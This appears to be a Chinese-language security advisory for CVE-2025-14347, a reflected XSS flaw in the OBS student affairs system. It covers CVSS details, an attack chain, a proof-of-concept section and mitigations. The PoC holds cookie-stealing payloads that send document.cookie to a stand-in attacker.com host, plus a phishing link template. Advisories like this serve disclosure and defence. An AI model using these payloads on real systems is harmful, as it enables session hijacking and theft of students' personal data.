CVE-2025-14347: OBS学生事务信息系统反射型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-14347

漏洞类型

XSS (跨站脚本攻击)

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Proliz Software Ltd. OBS (Student Affairs Information System)

漏洞概述

CVE-2025-14347是Proliz Software Ltd.开发的OBS（学生事务信息系统）中发现的反射型跨站脚本（XSS）漏洞。该漏洞的CVSS评分为6.3，属于中等严重程度。漏洞的根本原因在于应用程序在Web页面生成过程中未能正确对用户输入进行中和处理，导致攻击者可以在受害者浏览器中执行任意JavaScript代码。OBS系统通常用于高等院校的学生事务管理，处理学生个人信息、成绩记录、课程安排等敏感数据。攻击者通过构造恶意链接，诱使具有低权限的用户点击，即可窃取会话Cookie、劫持用户账户或进行钓鱼攻击。由于该系统处理的是教育机构的敏感数据，一旦被攻击成功，可能导致大量学生个人信息泄露，对教育机构的声誉和学生的隐私安全造成严重影响。建议受影响的单位尽快升级到修复版本26.5009或更高版本，并实施相应的安全防护措施。

技术细节

该漏洞是典型的反射型XSS（Cross-Site Scripting）漏洞，攻击向量为网络远程攻击。攻击者通过在URL参数中注入恶意JavaScript代码，当受害者访问包含恶意参数的链接时，服务器未经处理直接将用户输入反射回浏览器执行。CVSS向量显示攻击复杂度低（AC:L），但需要低权限用户（PR:L）点击恶意链接（UI:R）才能成功利用。攻击成功后，机密性影响为高（C:H），可窃取用户会话信息和敏感数据；完整性影响为低（I:L），攻击者可在当前用户权限范围内执行操作；可用性无影响（A:N）。由于是反射型XSS，攻击payload不会持久存储在服务器端，需要通过社工方式诱导用户点击恶意链接。攻击者通常利用短链接服务或钓鱼邮件隐藏恶意URL，绕过用户的安全意识。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者收集目标OBS系统的URL结构，识别可能存在反射点的参数

STEP 2

步骤2

载荷构造：攻击者构造包含恶意JavaScript代码的XSS payload，如<img src=x onerror=alert(document.cookie)>

STEP 3

步骤3

社工传播：攻击者通过钓鱼邮件、即时消息或短链接服务将恶意URL伪装成合法链接发送给目标用户

STEP 4

步骤4

诱导点击：低权限用户（学生或教职员工）点击恶意链接，浏览器向目标服务器发送请求

STEP 5

步骤5

漏洞触发：服务器将URL参数中的恶意代码未经处理直接反射到响应页面中

STEP 6

步骤6

脚本执行：受害者浏览器解析响应页面时，执行注入的恶意JavaScript代码

STEP 7

步骤7

数据窃取：恶意脚本窃取受害者的会话Cookie或其他敏感信息，并发送到攻击者服务器

STEP 8

步骤8

账户劫持：攻击者使用窃取的Cookie伪装成受害者进行未授权操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-14347 Reflected XSS PoC -->
<!-- Target: OBS (Student Affairs Information System) before version 26.5009 -->

<!-- Malicious URL that triggers the XSS -->
<!-- Replace TARGET_URL with the actual OBS application URL -->
<script>
function generateXSSPayload() {
    const targetUrl = "TARGET_URL";
    // XSS payload using img onerror event
    const xssPayload = '<img src=x onerror="fetch(\'https://attacker.com/steal?cookie=\'+document.cookie)">';
    
    // Construct malicious URL
    const maliciousUrl = targetUrl + '/page?' + 
        encodeURIComponent('param') + '=' + 
        encodeURIComponent(xssPayload);
    
    console.log('Malicious URL:', maliciousUrl);
    return maliciousUrl;
}

// Display the generated malicious URL
console.log('CVE-2025-14347 PoC - Reflected XSS in OBS');
console.log('Generated malicious URL:', generateXSSPayload());
</script>

<!-- HTML PoC for social engineering -->
<!-- 
1. Host this HTML page or embed in phishing email
2. When victim clicks the link, XSS payload executes
3. Victim's session cookie is sent to attacker controlled server
-->
<a href='TARGET_URL/page?param=<img src=x onerror="document.location=\'https://attacker.com/log?c=\'+document.cookie">'>Click here for important update</a>

影响范围

OBS (Student Affairs Information System) 0 < 26.5009

防御指南

临时缓解措施

在官方修复版本发布之前，可采取以下临时缓解措施：1）使用WAF规则对常见XSS payload进行过滤和阻断；2）在反向代理层配置输入验证规则；3）启用浏览器的XSS过滤器（如Chrome的XSS Auditor）；4）限制用户访问可疑URL；5）加强对用户的安全意识培训，提醒不要点击来源不明的链接；6）实施严格的CORS策略；7）监控Web日志中的异常请求模式。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-14347
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-14347
3 Details https://www.cvedetails.com/cve/CVE-2025-14347/
4 VulDB https://vuldb.com/cve/CVE-2025-14347
5 Link https://www.usom.gov.tr/bildirim/tr-25-0463